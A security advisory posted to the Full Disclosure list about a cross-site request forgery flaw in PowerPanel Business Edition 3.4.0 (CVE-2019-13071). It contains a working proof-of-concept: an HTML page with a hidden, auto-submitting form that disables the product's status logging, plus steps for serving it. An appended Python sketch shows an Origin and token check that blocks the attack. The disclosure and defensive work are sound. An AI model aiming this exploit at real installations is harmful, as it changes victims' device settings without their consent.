
List:       full-disclosure
Subject:    [FD] PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery
From:       Joey Lane via Fulldisclosure <fulldisclosure () seclists ! org>
Date:       2019-07-09 22:19:27
Message-ID: CAP5CuhoK4eNSFWD5DV-yzTQHE4r7ORV3t0REB5afv5fMZh8OVA () mail ! gmail ! com

# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : CVE-2019-13071
# Reported to vendor on 5/25/2019, no acknowledgement.

The Agent/Center component of PowerPanel Business Edition is vulnerable to
cross-site request forgery. Its state-changing POST handlers rely only on the
session cookie the browser attaches automatically, so the flaw can be
exploited by tricking an authenticated user into visiting a web page
controlled by a malicious person.

The following example uses CSRF to disable Status Recording under the Logs
/ Settings page.  Create a file named 'csrf.html' on a local workstation
with the following contents:

<iframe style="display:none" name="csrf-frame"></iframe>
<div style="display: none;">
<form method='POST' action='http://(A VALID HOST NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='value(recordingEnable)' value='no'>
  <input type='hidden' name='value(recordingInterval)' value='10'>
  <input type='hidden' name='value(periodToRemoveRecord)' value='2'>
  <input type='hidden' name='value(clearAllStatusLogs)' value='no'>
  <input type='hidden' name='value(type)' value='records'>
  <input type='hidden' name='value(action)' value='Apply'>
  <input type='hidden' name='value(button)' value='Apply'>
  <input type='submit' value='submit'>
</form>
</div>
<script>document.getElementById("csrf-form").submit()</script>

Serve the file using python or any other web server:

python -m SimpleHTTPServer 8000

Visit the local page in a browser while logged into PowerPanel Business
Edition:

http://localhost:8000/csrf.html

The hidden form is submitted in the background, and will disable Status
Recording.  This could be adapted to exploit other forms in the web
application as well.
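As an added defender-side example (not part of the advisory and not the vendor's code), the following Python sketch shows how a handler for the /agent/log_options endpoint above would reject the forged POST: it requires the browser's Origin (or Referer) to match the agent's own origin and a synchronizer token bound to the session. The agent origin, field name csrf_token and helper names are assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumed values for illustration only; the real agent's hostname is site-specific.
AGENT_ORIGIN = "http://ups-agent.example.internal:3052"   # constructed
PROTECTED_PATH = "/agent/log_options"                      # endpoint from the advisory


def issue_csrf_token(session):
    """Bind a fresh random token to the server-side session and return it.
    The page that renders the Logs / Settings form echoes it in a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def request_is_forged(headers, form, session):
    """Return a reason string if the POST must be rejected, else None.

    Two independent checks: (1) Origin, falling back to Referer, must match the
    agent's own scheme/host/port; (2) the form must carry the token bound to the
    session. A cross-site page like csrf.html can trigger the POST (the browser
    attaches the session cookie) but can satisfy neither check."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return "missing Origin/Referer"
    o, a = urlparse(origin), urlparse(AGENT_ORIGIN)
    if (o.scheme, o.hostname, o.port) != (a.scheme, a.hostname, a.port):
        return "cross-site origin %s" % origin
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return "missing or invalid CSRF token"
    return None


def handle_log_options(headers, form, session):
    """Apply the Status Recording change only for a legitimate same-site request.
    Returns (http_status, applied_settings_or_None)."""
    reason = request_is_forged(headers, form, session)
    if reason:
        return 403, None
    return 200, {"recordingEnable": form.get("value(recordingEnable)")}
```

Either check alone stops the PoC; keeping both covers the case where a browser omits Origin on some same-site navigations.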

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/